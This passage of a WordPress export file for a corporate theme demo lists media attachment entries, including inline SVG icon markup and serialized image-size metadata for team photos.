		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/portfolio-2/</link>
		<pubDate>Wed, 09 Sep 2020 08:35:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/portfolio.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>666</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:35:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:35:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/portfolio.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/portfolio.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/pheader-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>691</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/09/pheader-team.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-team-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-team-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-team-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-team-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-team-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-team-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/team5/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>694</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team5-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team5-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team5-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/team6/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>695</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team6-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team6-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team6-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team6-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team6-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/team7/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>696</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team7-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team7-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team7-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team7-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team7-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/team8/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>697</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team8.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team8-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team8-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team8-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team8-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team8-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/image1-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:53:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>699</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:53:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:53:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:959;s:6:"height";i:650;s:4:"file";s:25:"2020/09/image1-team.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:25:"image1-team-1-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"image1-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"image1-team-1-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"image1-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"image1-team-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image1-team-1-959x600.jpg";s:5:"width";i:959;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-single-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/single-team/image1-single-team/</link>
		<pubDate>Thu, 10 Sep 2020 03:28:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>713</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 03:28:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 03:28:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-single-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>711</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-single-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
